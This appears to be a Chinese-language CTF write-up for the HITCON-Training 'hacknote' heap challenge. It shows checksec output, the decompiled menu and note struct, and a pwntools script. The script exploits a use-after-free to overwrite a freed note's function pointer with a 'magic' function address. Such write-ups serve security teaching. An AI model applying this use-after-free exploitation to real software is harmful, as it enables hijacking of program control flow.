目录
hacknote
file checksec
root@ubuntu:/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote# file hacknote
hacknote: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8278e3f039d24b529afdaa536d8093784a7e4033, not stripped
root@ubuntu:/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote# checksec hacknote[*] '/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote/hacknote'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
ida32查看
int menu()
{
puts("----------------------");
puts(" HackNote ");
puts("----------------------");
puts(" 1. Add note ");
puts(" 2. Delete note ");
puts(" 3. Print note ");
puts(" 4. Exit ");
puts("----------------------");
return printf("Your choice :");
}
结构体
00000000 note struc ; (sizeof=0x8, mappedto_1)
00000000 put dd ? ; offset
00000004 content dd ? ; offset
00000008 note ends
#!/usr/bin/env python2
from pwn import *
arch = "i386"
filename = "hacknote"
context(os="linux", arch=arch, log_level="debug")
content = 0
offset = 0
# elf
elf = ELF(filename)
# libc
def add(i,size,content):
io.sendline('1')
io.sendline(str(size))
io.sendline(content)
def delete(index):
io.sendline('2')
io.sendline(str(index))
def p(index):
io.sendline('3')
io.sendline(str(index))
def b(addr):
bk = "b *" + str(addr)
gdb.attach(io, bk)
success("attach")
def main():
global io
if content == 0:
io = process("./" + filename)
else:
io = remote("")
add(0,32,b'aaaa')
add(1,32,b'bbbb')
#b(0x08048A7C)
delete(0)
delete(1)
b(0x08048A7C)
magic_addr=0x08048986
add(1,8,p32(magic_addr))
#b(0x08048A7C)
p(0)
io.recv()
io.interactive()
main()